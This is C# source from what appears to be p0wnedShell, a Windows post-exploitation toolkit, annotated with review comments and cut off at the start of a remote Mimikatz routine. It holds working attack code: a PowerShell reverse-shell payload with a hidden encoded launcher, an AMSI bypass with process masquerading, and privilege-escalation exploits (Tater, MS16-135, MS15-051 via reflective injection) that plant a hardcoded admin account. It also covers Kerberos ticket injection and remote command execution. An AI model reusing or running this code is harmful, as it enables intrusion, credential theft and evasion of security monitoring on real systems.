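/// <summary>
/// Program entry point. Hands control straight to <c>Pshell.InvokeShell()</c>; it takes no
/// arguments, returns nothing and does no work of its own.
/// </summary>
public static void Main()
        {
            // The original also read PROCESSOR_ARCHITECTURE into a local and declared an
            // int userInput here, but neither was ever used; both locals are dropped.
            Pshell.InvokeShell();
        }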
        /// <summary>
        /// Runs the Tater "Trigger 2" flow (WebClient service + scheduled task, per the banner
        /// text) through the PowerShell runspace and then reports whether the expected local
        /// administrator account showed up.
        /// </summary>
        /// <remarks>
        /// Host-side behaviour a defender can look for: an Invoke-Tater invocation followed by a
        /// "net localgroup administrators" query, both issued from this process. Failures of
        /// either call are printed to the console and otherwise swallowed.
        /// </remarks>
        public static void Trigger2()
        {
            // Banner text is prepared, but the PrintBanner call below is commented out, so
            // toPrint is currently dead.
            string[] toPrint = { "* WebClient Service + Scheduled Task Trigger (Works on Windows 10). *",
                                 "*                                                                   *" };
//            Program.PrintBanner(toPrint);

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write("[+] Please wait while running our exploit\n\n");
            Console.ResetColor();

            // TaterCommand() is presumably a sibling helper in this file; its return value is
            // spliced into the command line verbatim.
            string Trigger_2 = "Invoke-Tater -Command " + TaterCommand() + "-Trigger 2 -ShowHelp N";

            try
            {
                P0wnedListener.Execute(Trigger_2);
            }
            catch (Exception e)
            {
                // Best-effort: report and fall through to the verification step.
                Console.WriteLine(e.Message);
            }

            string Admin      = "net localgroup administrators";
            string AdminPower = null;

            try
            {
                AdminPower = Pshell.RunPSCommand(Admin);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            // NOTE(review): if RunPSCommand threw, AdminPower is still null here and this
            // IndexOf raises NullReferenceException instead of reporting a failure.
            if (AdminPower.IndexOf("BadAss", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("\n[!] You should now be able to login as user \"BadAss\" with passwd \"FacePalm01\"");
                Console.WriteLine("[!] To make life easier, it should also PopUp a CommandShell with Local Administrator privileges :)\n");
                Console.ResetColor();
                // Finished() is not visible in this excerpt; presumably a sibling helper.
                Finished();
            }

            Console.WriteLine("\nPress Enter to Continue...");
            Console.ReadLine();
            return;
        }
        /// <summary>
        /// Interactively collects a listener address and port, writes a PowerShell TCP
        /// reverse-shell one-liner plus an encoded launcher to disk, and then starts a powercat
        /// listener on that port.
        /// </summary>
        /// <remarks>
        /// Files written under Program.P0wnedPath(): Invoke-PowerShellTcpOneLine.ps1,
        /// Encoded.txt (deleted again on the success path) and EncodedPayload.bat. Those are
        /// the on-disk artifacts of this routine. Console.ReadLine() returns null at end of
        /// input, which the ToLower()/Parse calls below do not guard against.
        /// </remarks>
        public static void PowerReversed()
        {
            PowerBanner();
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("Setup an reversed listener so remote clients can connect-back to you.\n");
            Console.ResetColor();

            // 1.1.1.1 is a placeholder; see the NOTE(review) on the "y" branch below.
            int       Lport = 0;
            IPAddress Lhost = IPAddress.Parse("1.1.1.1");

            IPAddress LocalIPAddress = null;

            // Pick the first IPv4 address of the local host entry; IPv6 entries are skipped.
            foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
            {
                if (address.AddressFamily == AddressFamily.InterNetwork)
                {
                    LocalIPAddress = address;
                    break;
                }
            }

            if (LocalIPAddress != null)
            {
                Console.Write("\n[+] Our local IP address is: {0}, do you want to use this?  (y/n) > ", LocalIPAddress);
                Lhost = LocalIPAddress;
            }

            string input = Console.ReadLine();

            switch (input.ToLower())
            {
            case "y":
                // NOTE(review): when no IPv4 address was found the prompt above was never
                // shown, and answering "y" keeps the 1.1.1.1 placeholder as Lhost.
                break;

            case "n":
                // Re-prompt until IPAddress.Parse accepts the line; the bare catch also
                // swallows a null line (end of input), which just re-prompts.
                while (true)
                {
                    try
                    {
                        Console.Write("\nEnter ip address of your PowerCat Listener (e.g. 127.0.0.1): ");
                        Console.ForegroundColor = ConsoleColor.Green;
                        Lhost = IPAddress.Parse(Console.ReadLine());
                        Console.ResetColor();
                        Console.WriteLine();
                        break;
                    }
                    catch
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] That's not a valid IP address, Please Try again");
                        Console.ResetColor();
                    }
                }
                break;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            // Re-prompt until the port parses and lies in 1..65535.
            while (true)
            {
                try
                {
                    Console.Write("Now Enter the listening port of your PowerCat Listener (e.g. 1337 or 4444): ");
                    Console.ForegroundColor = ConsoleColor.Green;
                    Lport = int.Parse(Console.ReadLine());
                    Console.ResetColor();
                    Console.WriteLine();

                    if (Lport < 1 || Lport > 65535)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("[+] That's not a valid Port, Please Try again\n");
                        Console.ResetColor();
                    }
                    else
                    {
                        break;
                    }
                }
                catch
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\n[+] That's not a valid Port, Please Try again\n");
                    Console.ResetColor();
                }
            }

            // One-line PowerShell reverse shell: connects to Lhost:Lport and loops, reading a
            // line, running it with iex and writing the output back; Lhost/Lport are embedded
            // as literals.
            string Payload = "$client = New-Object System.Net.Sockets.TCPClient(\"" + Lhost + "\"," + Lport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()";

            Console.WriteLine("[+] Generating a PowerShell Payload which you can run on your remote clients, so they connect-back to you ;)\n");
            Console.ForegroundColor = ConsoleColor.Green;
            // On-disk artifact #1: the plain-text script.
            File.WriteAllText(Program.P0wnedPath() + "\\Invoke-PowerShellTcpOneLine.ps1", Payload);
            Console.WriteLine("Payload saved as\t\t .\\Invoke-PowerShellTcpOneLine.ps1");
            //System.Diagnostics.Process.Start("notepad.exe", Program.P0wnedPath()+"\\Invoke-PowerShellTcpOneLine.ps1");
            Console.ResetColor();

            // Invoke-Encode writes Encoded.txt and EncodedPayload.bat next to the script; all
            // three paths are passed unquoted.
            string Encode = "Invoke-Encode -DataToEncode " + Program.P0wnedPath() + "\\Invoke-PowerShellTcpOneLine.ps1 -OutCommand -OutputFilePath " + Program.P0wnedPath() + "\\Encoded.txt -OutputCommandFilePath " + Program.P0wnedPath() + "\\EncodedPayload.bat";

            Pshell.RunPSCommand(Encode);

            string EncodedCmd = String.Empty;

            if (File.Exists(Program.P0wnedPath() + "\\EncodedPayload.bat"))
            {
                // On-disk artifact #2: EncodedPayload.bat is rewritten as a hidden-window
                // "powershell.exe -e <base64>" launcher; Encoded.txt is removed.
                File.Delete(Program.P0wnedPath() + "\\Encoded.txt");
                EncodedCmd = File.ReadAllText(Program.P0wnedPath() + "\\EncodedPayload.bat");
                File.WriteAllText(Program.P0wnedPath() + "\\EncodedPayload.bat", "powershell.exe -windowstyle hidden -e " + EncodedCmd);
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("Encoded Payload saved as\t .\\EncodedPayload.bat");
                Console.ResetColor();
            }
            else
            {
                // Encoding failed (no .bat produced); Encoded.txt, if any, is left behind.
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Oops something went wrong, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.WriteLine("\n[+] Please wait while setting up our Listener...\n");

            // Start the local powercat listener on the chosen port; "-t 1000" is passed
            // through to powercat as-is (its meaning is powercat's, not defined here).
            string Reversed = "powercat -l -p " + Lport + " -t 1000 -Verbose";

            try
            {
                P0wnedListener.Execute(Reversed);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            return;
        }
        /// <summary>
        /// Interactive main loop of the toolkit: applies the start-up opsec steps (AMSI bypass,
        /// process masquerade, console sizing) and then dispatches menu choices until the user
        /// picks 17.
        /// </summary>
        /// <remarks>
        /// Detection-relevant behaviour visible here: AmsiBypass.Amsi on OS versions above 6.3
        /// (i.e. newer than Windows 8.1 / Server 2012 R2), PEBMasq.MasqueradePEB of the
        /// process image name, and an Amsi.dll removed from the temp folder on exit. The menu
        /// targets (PowerView, PowerUp, Inveigh, ...) live in other files.
        /// </remarks>
        public static void Entry()
        {
            // PROCESSOR_ARCHITECTURE describes the *process* architecture (a 32-bit process
            // on 64-bit Windows reads "x86"); only menu option 12 consults it.
            string  Arch               = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
            // 6.3 is the Windows 8.1 / Server 2012 R2 version number; anything newer takes
            // the AMSI bypass path.
            string  LatestOSVersion    = "6.3";
            decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);

            if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
            {
                // Directory part of masqBinary, lower-cased for the comparison below.
                // NOTE(review): Remove(LastIndexOf(@"\")) throws ArgumentOutOfRangeException
                // when masqBinary contains no backslash.
                string MasqPath   = p0wnedShellOpsec.masqBinary.Remove(p0wnedShellOpsec.masqBinary.LastIndexOf(@"\")).ToLower();
                string SystemPath = Environment.SystemDirectory.ToLower();

                AmsiBypass.Amsi(Arch);
                if (p0wnedShellOpsec.AutoMasq && MasqPath == SystemPath)
                {
                    // Starting Runspace before we Masquerade our Process
                    Pshell.P0wnedListener.Execute("Write-Host '[+] AMSI Bypassed'");
                }
            }

            // Masquerade when configured, or whenever stdin/stdout are redirected.
            if (p0wnedShellOpsec.AutoMasq || ConsoleEx.IsInputRedirected || ConsoleEx.IsOutputRedirected)
            {
                Console.WriteLine("[+] Auto Masquerade our Process to: {0}", p0wnedShellOpsec.masqBinary);
                if (!PEBMasq.MasqueradePEB(p0wnedShellOpsec.masqBinary))
                {
                    Console.WriteLine("[!] Auto Masquerade Failed :(");
                }
            }

            // The window title is only set when not masquerading — presumably so the title
            // does not contradict the disguised image name; confirm.
            if (!p0wnedShellOpsec.AutoMasq)
            {
                Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
            }

            // Resize only when some stream is still attached to a console; Math.Min keeps the
            // request within what the display allows.
            if (!ConsoleEx.IsInputRedirected || !ConsoleEx.IsOutputRedirected || !ConsoleEx.IsErrorRedirected)
            {
                Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
            }

            int userInput = 0;

            // DisplayMenu() (not visible here) returns the chosen number. 17 ends the loop;
            // any other value without a case prints the goodbye line and loops again.
            do
            {
                userInput = DisplayMenu();
                switch (userInput)
                {
                case 1:
                    Pshell.PowerView();
                    break;

                case 2:
                    SitAwareness.Menu();
                    break;

                case 3:
                    Pshell.PortScan();
                    break;

                case 4:
                    Execution.Menu();
                    break;

                case 5:
                    Pshell.PowerUp();
                    break;

                case 6:
                    GetSystem.Menu();
                    break;

                case 7:
                    Inveigh.Menu();
                    break;

                case 8:
                    Pshell.GetGPPPassword();
                    break;

                case 9:
                    Roast.Menu();
                    break;

                case 10:
                    ADAttacks.Menu();
                    break;

                case 11:
                    Exploits.Menu();
                    break;

                case 12:
                    // x86-only option, gated on the process architecture read above.
                    if (Arch == "x86")
                    {
                        Pshell.MS14_068();
                    }
                    else
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
                        Console.ResetColor();
                        Console.WriteLine("Press Enter to Continue...");
                        Console.ReadLine();
                    }
                    break;

                case 13:
                    p0wnedMeter.Menu();
                    break;

                case 14:
                    LatMovement.Menu();
                    break;

                case 15:
                    PowerCat.Menu();
                    break;

                case 16:
                    Pshell.InvokeShell();
                    break;

                default:
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("\nSee you later Alligator ;)");
                    Console.ResetColor();
                    break;
                }
            } while (userInput != 17);

            // Exit clean-up: remove the Amsi.dll dropped in the temp folder. Where it is
            // written is not visible here — presumably AmsiBypass.Amsi; confirm.
            // GetTempPath() typically already ends in a separator, so the path carries a
            // doubled backslash, which Windows still resolves.
            string TempFolder = Path.GetTempPath();

            if (File.Exists(TempFolder + "\\Amsi.dll"))
            {
                File.Delete(TempFolder + "\\Amsi.dll");
            }
        }
        /// <summary>
        /// Interactive pseudo-shell: each line typed is run on <paramref name="Hostname"/> via
        /// Invoke-PsExec and the output collected in Result.txt is echoed back.
        /// </summary>
        /// <param name="Hostname">
        /// Remote computer passed to Invoke-PsExec -ComputerName; spliced into the command
        /// string without quoting or escaping.
        /// </param>
        /// <remarks>
        /// Every command round-trips through Program.P0wnedPath()\Result.txt, which the remote
        /// invocation creates and this method deletes after printing; a missing file is
        /// treated as failure and ends the loop. Typing "exit" or "quit" returns.
        /// </remarks>
        public static void PsExecShell(string Hostname)
        {
            // Connectivity probe: a "whoami" round-trip must produce Result.txt.
            string TestConnection = "Invoke-PsExec -ComputerName " + Hostname + " -Command \"whoami\" -ResultFile \"" + Program.P0wnedPath() + "\\Result.txt\"";

            Pshell.RunPSCommand(TestConnection);
            if (!File.Exists(Program.P0wnedPath() + "\\Result.txt"))
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Cannot connect to server, probably insufficient permission or a firewall blocking our connection.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }
            File.Delete(Program.P0wnedPath() + "\\Result.txt");
            Console.WriteLine();

            while (true)
            {
                // A fresh 8 KiB stdin reader is installed on every iteration — presumably to
                // accept lines longer than the default console reader allows; confirm. The
                // previous reader is simply dropped, never disposed.
                int    bufSize  = 8192;
                Stream inStream = Console.OpenStandardInput(bufSize);
                Console.SetIn(new StreamReader(inStream, Console.InputEncoding, false, bufSize));

                Console.Write("[system@" + Hostname + " ~]$ ");
                string cmd    = Console.ReadLine();
                // Built before the exit check, so it is wasted on "exit"/"quit". cmd sits
                // inside double quotes with no escaping: a command containing '"' breaks the
                // PowerShell command line.
                string PsExec = "Invoke-PsExec -ComputerName " + Hostname + " -Command \"" + cmd + "\" -ResultFile \"" + Program.P0wnedPath() + "\\Result.txt\"";
                string Result = null;
                if (cmd == "exit")
                {
                    return;
                }
                else if (cmd == "quit")
                {
                    return;
                }
                else
                {
                    try
                    {
                        Pshell.RunPSCommand(PsExec);
                    }
                    catch (Exception e)
                    {
                        // Reported, then the Result.txt check below decides what happens.
                        Console.WriteLine(e.Message);
                    }
                }
                if (File.Exists(Program.P0wnedPath() + "\\Result.txt"))
                {
                    Result = System.IO.File.ReadAllText(Program.P0wnedPath() + "\\Result.txt");
                    System.Console.WriteLine("{0}", Result);
                    File.Delete(Program.P0wnedPath() + "\\Result.txt");
                }
                else
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("[+] Oops something went wrong, please try again!\n");
                    Console.ResetColor();
                    Console.WriteLine("Press Enter to Continue...");
                    Console.ReadLine();
                    return;
                }
            }
        }
        /// <summary>
        /// Runs the Invoke-MS16-135 script (CVE-2016-7255, win32k.sys NtSetWindowLongPtr)
        /// through the runspace and afterwards checks "whoami" for a SYSTEM token.
        /// </summary>
        /// <remarks>
        /// Refuses to run when the process bitness differs from the OS bitness. The success
        /// check is a case-insensitive substring search for "system" in the whoami output, so
        /// any account or host name containing that word also reads as success.
        /// </remarks>
        public static void MS16_135()
        {
            string[] toPrint = { "* Exploiting win32k.sys NtSetWindowLongPtr (CVE-2016-7255)          *",
                                 "* MS16-135 exploit By @TinySecEx and @FuzzySec                      *" };

            Program.PrintBanner(toPrint);

            string osArch = "x86";

            if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
            {
                osArch = "x64";
            }

            string procArch = "x86";

            if (Pshell.EnvironmentHelper.Is64BitProcess())
            {
                procArch = "x64";
            }

            //detect if the correct architecture is being used
            if (procArch != osArch)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
                Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            string MS16_135 = "Invoke-MS16-135";

            try
            {
                P0wnedListener.Execute(MS16_135);
            }
            catch (Exception e)
            {
                // Reported and swallowed; the whoami check below still runs.
                Console.WriteLine(e.Message);
            }

            string Whoami      = "whoami";
            string SystemPower = null;

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();
            try
            {
                SystemPower = Pshell.RunPSCommand(Whoami);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            // NOTE(review): SystemPower stays null if RunPSCommand threw, and this IndexOf
            // then raises NullReferenceException rather than taking the failure branch.
            if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue and Get The Party Started...");
                Console.ReadLine();
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
            }
            return;
        }
        /// <summary>
        /// Loads the embedded MS15-051 binary for the current architecture in-process via
        /// Invoke-ReflectivePEInjection and afterwards checks "whoami" for a SYSTEM token.
        /// </summary>
        /// <remarks>
        /// Refuses to run when process and OS bitness differ, or when the OS version is above
        /// 6.3 (newer than Windows 8.1 / Server 2012 R2). The PE bytes come from
        /// Binaries.MS15_051(osArch) as a space-separated string embedded in the command line,
        /// not from a file on disk. The success check is a case-insensitive substring search
        /// for "system" in the whoami output.
        /// </remarks>
        public static void MS15_051()
        {
            string[] toPrint = { "* Get into Ring0 using the MS15-051 Vulnerability.                  *" };

            Program.PrintBanner(toPrint);

            string osArch = "x86";

            if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
            {
                osArch = "x64";
            }

            string procArch = "x86";

            if (Pshell.EnvironmentHelper.Is64BitProcess())
            {
                procArch = "x64";
            }

            //detect if the correct architecture is being used
            if (procArch != osArch)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
                Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            // OS is assigned but never read; the version gate below uses RtlGetVersion().
            OperatingSystem OS = System.Environment.OSVersion;
            string          LatestOSVersion    = "6.3";
            decimal         latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);

            if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] MS15-051 is only exploitable on Windows 8.1/2012 R2 or lower.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("This Exploit can only succeed when patch KB3045171 is not installed on this system.\n");
            Console.ResetColor();
            Console.Write("[+] Please wait until loaded...\n");
            Console.WriteLine();

            // The PE image is passed inline as a space-separated byte string and split back
            // into an array on the PowerShell side.
            string MS15_051 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS15_051(osArch) + "\" -split ' ') -Verbose";

            try
            {
                P0wnedListener.Execute(MS15_051);
            }
            catch (Exception e)
            {
                // Reported and swallowed; the whoami check below still runs.
                Console.WriteLine(e.Message);
            }

            string Whoami      = "whoami";
            string SystemPower = null;

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();
            try
            {
                SystemPower = Pshell.RunPSCommand(Whoami);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            // NOTE(review): SystemPower stays null if RunPSCommand threw, and this IndexOf
            // then raises NullReferenceException rather than taking the failure branch.
            if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue and Get The Party Started...");
                Console.ReadLine();
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
            }
            return;
        }
        /// <summary>
        /// Runs the Tater "Trigger 1" flow (NBNS WPAD spoofing plus Defender signature update,
        /// per the banner text) through the runspace, prompting for a remote WPAD proxy when
        /// local port 80 is already taken, and then reports whether the expected local
        /// administrator account appeared.
        /// </summary>
        /// <remarks>
        /// Detection-relevant behaviour: an HTTP listener on port 80 (or the user-supplied
        /// port), spoofed answers for the chosen WPAD host name, optional UDP port exhaustion
        /// ("-ExhaustUDP Y"), and a later "net localgroup administrators" query. Failures of
        /// the PowerShell calls are printed and swallowed.
        /// </remarks>
        public static void Trigger1()
        {
            // toPrint is dead while the PrintBanner call stays commented out.
            string[] toPrint = { "* Trigger 1 -> NBNS WPAD Bruteforce + Defender Signature Updates    *" };
            //           Program.PrintBanner(toPrint);

            // 1.1.1.1 is a placeholder; it is only replaced when port 80 is already in use
            // and the remote-proxy prompts below run.
            IPAddress SpoofIP = IPAddress.Parse("1.1.1.1");
            int       Lport   = 80;

            // PortInUse() is not visible in this excerpt; presumably a sibling helper.
            if (PortInUse(Lport))
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("[!] Port " + Lport + " is already in use, so you need to setup a remote WPAD Proxy.");
                Console.WriteLine("[!] After running the remote WPAD Proxy, come back and enter the new Spoofed WPAD IP and HTTP Listener Port.\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();

                // Re-prompt until IPAddress.Parse accepts the line; the bare catch also
                // swallows a null line at end of input.
                while (true)
                {
                    try
                    {
                        Console.Write("Enter the IP address of the remote WPAD Proxy (e.g. 192.168.1.1): ");
                        Console.ForegroundColor = ConsoleColor.Green;
                        SpoofIP = IPAddress.Parse(Console.ReadLine());
                        Console.ResetColor();
                        Console.WriteLine();
                        break;
                    }
                    catch
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] That's not a valid IP address, Please Try again");
                        Console.ResetColor();
                    }
                }

                // Re-prompt until the port parses and lies in 1..65535.
                while (true)
                {
                    try
                    {
                        Console.Write("Now enter the listening port of the Tater HTTP Listener (e.g. 81 or 8080): ");
                        Console.ForegroundColor = ConsoleColor.Green;
                        Lport = int.Parse(Console.ReadLine());
                        Console.ResetColor();
                        Console.WriteLine();

                        if (Lport < 1 || Lport > 65535)
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine("[+] That's not a valid Port, Please Try again\n");
                            Console.ResetColor();
                        }
                        else
                        {
                            break;
                        }
                    }
                    catch
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("\n[+] That's not a valid Port, Please Try again\n");
                        Console.ResetColor();
                    }
                }
            }

            string WpadHost = "WPAD";

            Console.Write("Default WPAD entry to spoof is: {0}, do you want to use this?  (y/n) > ", WpadHost);

            // NOTE(review): a null line (end of input) makes input.ToLower() throw.
            string input = Console.ReadLine();

            switch (input.ToLower())
            {
            case "y":
                break;

            case "n":
                // Taken verbatim; no validation of the host name entered.
                Console.Write("\nEnter WPAD host entry to spoof (e.g. WPAD.YOURDOMAIN.LOCAL): ");
                Console.ForegroundColor = ConsoleColor.Green;
                WpadHost = Console.ReadLine();
                Console.ResetColor();
                break;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n [!] Wrong choice, please try again!");
                Console.ResetColor();
                return;
            }
            // Both accepted answers assign Exhaust explicitly; the initial "N" is only a
            // default that the switch always overrides or returns past.
            string Exhaust = "N";

            Console.Write("\nEnable UDP port exhaustion to force all DNS lookups to fail (Be Cautious)?  (y/n) > ");

            input = Console.ReadLine();
            switch (input.ToLower())
            {
            case "y":
                Exhaust = "Y";
                break;

            case "n":
                Exhaust = "N";
                break;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n [!] Wrong choice, please try again!");
                Console.ResetColor();
                return;
            }

            string Trigger_1 = null;

            // NOTE(review): this re-queries port 80 instead of reusing the PortInUse(Lport)
            // result from above; if the port state changed in between, the two branches
            // disagree (e.g. SpoofIP/Lport passed without ever having been prompted for).
            if (PortInUse(80))
            {
                Trigger_1 = "Invoke-Tater -Command " + TaterCommand() + " -SpooferIP " + SpoofIP + " -HTTPPort " + Lport + " -ExhaustUDP " + Exhaust + " -Hostname " + WpadHost + " -ShowHelp N";
            }
            else
            {
                Trigger_1 = "Invoke-Tater -Command " + TaterCommand() + " -ExhaustUDP " + Exhaust + " -Hostname " + WpadHost + " -ShowHelp N";
            }

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write("\n[+] Now please wait while running our exploit\n\n");
            Console.ResetColor();

            try
            {
                P0wnedListener.Execute(Trigger_1);
            }
            catch (Exception e)
            {
                // Reported and swallowed; verification below still runs.
                Console.WriteLine(e.Message);
            }

            string Admin      = "net localgroup administrators";
            string AdminPower = null;

            try
            {
                AdminPower = Pshell.RunPSCommand(Admin);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
            // NOTE(review): AdminPower stays null if RunPSCommand threw, and this IndexOf
            // then raises NullReferenceException instead of reporting a failure.
            if (AdminPower.IndexOf("BadAss", 0, StringComparison.OrdinalIgnoreCase) != -1)
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("\n[!] You should now be able to login as user \"BadAss\" with passwd \"FacePalm01\"");
                Console.WriteLine("[!] To make life easier, it should also PopUp a CommandShell with Local Administrator privileges :)\n");
                Console.ResetColor();
                // Finished() is not visible in this excerpt; presumably a sibling helper.
                Finished();
            }

            Console.WriteLine("\nPress Enter to Continue...");
            Console.ReadLine();
            return;
        }
        /// <summary>
        /// Injects a Kerberos ticket file into the current logon session with Mimikatz
        /// (kerberos::ptt), optionally purging the existing tickets first (kerberos::purge).
        /// </summary>
        /// <remarks>
        /// The ticket path is embedded verbatim inside a single-quoted PowerShell string that
        /// itself contains double quotes, so a path holding either quote character breaks the
        /// command. The file's existence is only checked after the y/n prompt is answered, and
        /// Console.ReadLine() returning null (end of input) is not handled.
        /// </remarks>
        public static void PassTheTicket()
        {
            string[] toPrint = { "* Use Mimikatz to inject a (Golden/Silver) Kerberos Ticket.         *" };
            Program.PrintBanner(toPrint);

            // Verbatim empty literal; overwritten by the prompt below.
            string ticket          = @"";
            string Pass_The_Ticket = null;

            Console.Write("[+] Please enter the name of the ticket file > ");
            Console.ForegroundColor = ConsoleColor.Green;
            // ReadLine already strips the line terminator, so the TrimEnd should be a no-op.
            ticket = Console.ReadLine().TrimEnd('\r', '\n');
            Console.ResetColor();
            if (ticket == "")
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] This is not a valid ticket name, please try again\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.Write("\n[+] Do you want to purge existing Kerberos tickets? (y/n) > ");
            string input = Console.ReadLine();

            switch (input.ToLower())
            {
            case "y":
                Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\" \"kerberos::ptt " + ticket + "\"'";
                break;

            case "n":
                Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::ptt " + ticket + "\"'";
                break;

            default:
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            // Existence check is relative to the process working directory unless the user
            // typed an absolute path.
            if (File.Exists(ticket))
            {
                Console.ForegroundColor = ConsoleColor.Yellow;
                Console.WriteLine("\n[+] Now lets inject our Kerberos ticket in the current session.\n");
                Console.ResetColor();
                try
                {
                    // Mimikatz output is printed straight to the console.
                    Console.WriteLine(Pshell.RunPSCommand(Pass_The_Ticket));
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.Message);
                }
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Ticket not found, please try again!\n");
                Console.ResetColor();
                Console.WriteLine("Press Enter to Continue...");
                Console.ReadLine();
                return;
            }

            Console.WriteLine("Press Enter to Continue...");
            Console.ReadLine();
            return;
        }
        /// <summary>
        /// Runs Invoke-Mimikatz -DumpCreds against a remote host named by the user and prints
        /// the result.
        /// </summary>
        /// <remarks>
        /// NOTE(review): the remote dump is executed twice — once into Creds, which is used
        /// only for a length check, and a second time when printing. If RunPSCommand throws,
        /// Creds stays null and Creds.Length raises NullReferenceException. Hostname is
        /// spliced into the command inside double quotes with no escaping.
        /// </remarks>
        public static void Remote_Mimikatz()
        {
